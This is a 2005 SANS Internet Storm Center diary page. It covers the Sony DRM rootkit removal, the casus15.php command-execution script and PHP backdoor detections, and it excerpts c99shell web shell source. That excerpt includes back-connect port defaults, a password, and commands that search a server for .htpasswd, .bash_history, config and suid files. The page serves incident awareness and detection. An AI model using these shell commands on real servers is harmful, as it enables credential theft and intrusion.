Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-11-13 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Sony DRM Rootkit to be removed automatically by Microsoft

Published: 2005-11-13
Last Updated: 2005-11-13 14:36:09 UTC
by Patrick Nolan (Version: 1)
0 comment(s)
Microsoft says "Rootkits have a clearly negative impact on not only the security, but also the reliability and performance of their systems" "and have determined that in order to help protect our customers we will add a detection and removal signature for the rootkit component of the XCP software".

"Brian Krebs on Computer Security" also covered it here.
Keywords:
0 comment(s)

php - a defacement file information request

Published: 2005-11-13
Last Updated: 2005-11-13 02:03:40 UTC
by Patrick Nolan (Version: 4)
0 comment(s)
A while back casus15.php was being found on a number of servers. According to one source at the time "Its a script that was created to excute system commands on your server using the system() function.". If you're running into casus15.php please drop us a note on your determination of how it was installed at your network.

casus15.php has shown up a few times at Zone-H DIGITAL ATTACKS ARCHIVE.

Googlebot's capture of one system, that caught a SSH connection, scroll to the bottom and catch;
_ENV["SSH_CONNECTION"] 200.74.99.107 4172 217.160.240.17 22

Thanks!
Keywords:
0 comment(s)

PHP/BackDoor.gen

Published: 2005-11-13
Last Updated: 2005-11-13 02:00:53 UTC
by Patrick Nolan (Version: 1)
0 comment(s)
McAfee has developed a generic detection - PHP/BackDoor.gen. They say it's a detection for a "remote access trojan written in PHP scripting language.".

One use of it happened at and is described here and says;

"The attack came about because of major security hole in the Simple PHP Blog that was being used in political subdomain of the Nos site. The security hole allowed for an outside CGI script injection that revealed the login and password for the blog. From there, the hacker used the c99shell.php (v.1.0 pre-release build #13) script , which while not allowing direct admin access to the server and it's modules, allows for deletion of basically all common and not so commom files from the root level all the way down. So, this is why everything was gone from the site, as the hacker just deleted everything from the sever itself.

I went to blog author's site and saw that several other people has also suffered the same fate, although in their cases it was generally only the blog itself that was hacked as that was all they were using on their site. In any case, I did let them have a piece of my mind and basically saying that anything that is that wide open should not even be released as an alpha version, much less beta.

I went over my data logs and was able to easily obain the hacker's ip address as well as all activity on the site. Their host., ISP and the FBI will be contacted this week about this intrusion.

I urge everyone who is using SImple PHP Blog to remove it from your server and use a more secure blog, such as Serendipity.."".

Not included in the McAfee write up of their version of c99shell.txt is some basic default information (from c99shell.php v.1.0 pre-release build #16);

xxxxx

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

xxxxx

$bindport_pass = "c99";      // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe

xxxxx

   all suid files", "find / -type f -perm -04000 -ls
   suid files in current dir", "find . -type f -perm -04000 -ls
   all sgid files", "find / -type f -perm -02000 -ls
   sgid files in current dir", "find . -type f -perm -02000 -ls
   config.inc.php files", "find / -type f -name config.inc.php
   config* files", "find / -type f -name \"config*\"
   config* files in current dir", "find . -type f -name \"config*\"
   all writable folders and files", "find / -perm -2 -ls"),
   all writable folders and files in current dir", "find . -perm -2 -ls
   all service.pwd files", "find / -type f -name service.pwd
   service.pwd files in current dir", "find . -type f -name service.pwd
   all .htpasswd files", "find / -type f -name .htpasswd
   .htpasswd files in current dir", "find . -type f -name .htpasswd
   all .bash_history files", "find / -type f -name .bash_history
   .bash_history files in current dir", "find . -type f -name .bash_history
   all .fetchmailrc files", "find / -type f -name .fetchmailrc
   .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc
   list file attributes on a Linux second extended file system", "lsattr -va
   show opened ports", "netstat -an | grep -i listen

xxxxx

Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.

xxxxx

echo "<b>Ftp Quick brute:</b><br>";
 if (!win) {echo "This functions not work in Windows!<br><br>";}

xxxxx

Simple PHP Blog vulnerability and patch link for Secunia.

Keywords:
0 comment(s)
Diary Archives